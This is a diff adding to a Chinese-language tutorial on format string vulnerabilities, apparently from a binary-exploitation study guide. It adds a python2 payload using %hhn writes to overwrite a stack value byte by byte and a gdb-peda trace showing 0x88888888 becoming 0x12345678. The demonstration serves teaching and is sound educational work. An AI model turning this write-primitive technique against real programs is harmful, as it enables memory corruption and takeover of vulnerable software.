diff --git a/doc/3.3.1_format_string.md b/doc/3.3.1_format_string.md index f195e70..10c0d9c 100644 --- a/doc/3.3.1_format_string.md +++ b/doc/3.3.1_format_string.md @@ -1040,7 +1040,96 @@ gdb-peda$ x/4wb 0xffffd538 ``` 把 `AAAA`、`BBBB`、`CCCC`、`DDDD` 占据的地址分别替换成括号中的值,再适当使用填充字节使 8 字节对齐就可以了。构造输入如下: ``` +$ python2 -c 'print("\x38\xd5\xff\xff"+"\x39\xd5\xff\xff"+"\x3a\xd5\xff\xff"+"\x3b\xd5\xff\xff"+"%104c%13$hhn"+"%222c%14$hhn"+"%222c%15$hhn"+"%222c%16$hhn")' > text +``` +其中前四个部分是 4 个写入地址,占 4*4=16 字节,后面四个部分分别用于写入十六进制数,由于使用了 `hh`,所以只会保留一个字节 `0x78`(16+104=120 -> 0x56)、`0x56`(120+222=342 -> 0x0156 -> 56)、`0x34`(342+222=564 -> 0x0234 -> 0x34)、`0x12`(564+222=786 -> 0x312 -> 0x12)。执行结果如下: +``` +$ gdb -q a.out +Reading symbols from a.out...(no debugging symbols found)...done. +gdb-peda$ b printf +Breakpoint 1 at 0x8048350 +gdb-peda$ r < text +Starting program: /home/firmy/Desktop/RE4B/a.out < text +[----------------------------------registers-----------------------------------] +EAX: 0xffffd564 --> 0xffffd538 --> 0x88888888 +EBX: 0x804a000 --> 0x8049f14 --> 0x1 +ECX: 0x1 +EDX: 0xf7f9883c --> 0x0 +ESI: 0xf7f96e68 --> 0x1bad90 +EDI: 0x0 +EBP: 0xffffd5f8 --> 0x0 +ESP: 0xffffd52c --> 0x8048520 (: add esp,0x20) +EIP: 0xf7e27c20 (: call 0xf7f06d17 <__x86.get_pc_thunk.ax>) +EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow) +[-------------------------------------code-------------------------------------] + 0xf7e27c1b : ret + 0xf7e27c1c: xchg ax,ax + 0xf7e27c1e: xchg ax,ax +=> 0xf7e27c20 : call 0xf7f06d17 <__x86.get_pc_thunk.ax> + 0xf7e27c25 : add eax,0x16f243 + 0xf7e27c2a : sub esp,0xc + 0xf7e27c2d : mov eax,DWORD PTR [eax+0x124] + 0xf7e27c33 : lea edx,[esp+0x14] +No argument +[------------------------------------stack-------------------------------------] +0000| 0xffffd52c --> 0x8048520 (: add esp,0x20) +0004| 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x88888888 +0008| 0xffffd534 --> 0x1 +0012| 0xffffd538 --> 0x88888888 +0016| 0xffffd53c --> 0xffffffff +0020| 0xffffd540 --> 0xffffd55a ("ABCD") +0024| 0xffffd544 --> 0xffffd564 --> 0xffffd538 --> 0x88888888 +0028| 0xffffd548 --> 0x80481fc --> 0x38 ('8') +[------------------------------------------------------------------------------] +Legend: code, data, rodata, value +Breakpoint 1, 0xf7e27c20 in printf () from /usr/lib32/libc.so.6 +gdb-peda$ x/20x $esp +0xffffd52c: 0x08048520 0xffffd564 0x00000001 0x88888888 +0xffffd53c: 0xffffffff 0xffffd55a 0xffffd564 0x080481fc +0xffffd54c: 0x080484b0 0xf7ffda54 0x00000001 0x424135d0 +0xffffd55c: 0x00004443 0x00000000 0xffffd538 0xffffd539 +0xffffd56c: 0xffffd53a 0xffffd53b 0x34303125 0x33312563 +gdb-peda$ finish +Run till exit from #0 0xf7e27c20 in printf () from /usr/lib32/libc.so.6 +[----------------------------------registers-----------------------------------] +EAX: 0x312 +EBX: 0x804a000 --> 0x8049f14 --> 0x1 +ECX: 0x0 +EDX: 0xf7f98830 --> 0x0 +ESI: 0xf7f96e68 --> 0x1bad90 +EDI: 0x0 +EBP: 0xffffd5f8 --> 0x0 +ESP: 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x12345678 +EIP: 0x8048520 (: add esp,0x20) +EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow) +[-------------------------------------code-------------------------------------] + 0x8048514 : lea eax,[ebp-0x94] + 0x804851a : push eax + 0x804851b : call 0x8048350 +=> 0x8048520 : add esp,0x20 + 0x8048523 : sub esp,0xc + 0x8048526 : push 0xa + 0x8048528 : call 0x8048370 + 0x804852d : add esp,0x10 +[------------------------------------stack-------------------------------------] +0000| 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x12345678 +0004| 0xffffd534 --> 0x1 +0008| 0xffffd538 --> 0x12345678 +0012| 0xffffd53c --> 0xffffffff +0016| 0xffffd540 --> 0xffffd55a ("ABCD") +0020| 0xffffd544 --> 0xffffd564 --> 0xffffd538 --> 0x12345678 +0024| 0xffffd548 --> 0x80481fc --> 0x38 ('8') +0028| 0xffffd54c --> 0x80484b0 (: add ebx,0x1b50) +[------------------------------------------------------------------------------] +Legend: code, data, rodata, value +0x08048520 in main () +gdb-peda$ x/20x $esp +0xffffd530: 0xffffd564 0x00000001 0x12345678 0xffffffff +0xffffd540: 0xffffd55a 0xffffd564 0x080481fc 0x080484b0 +0xffffd550: 0xf7ffda54 0x00000001 0x424135d0 0x00004443 +0xffffd560: 0x00000000 0xffffd538 0xffffd539 0xffffd53a +0xffffd570: 0xffffd53b 0x34303125 0x33312563 0x6e686824 ```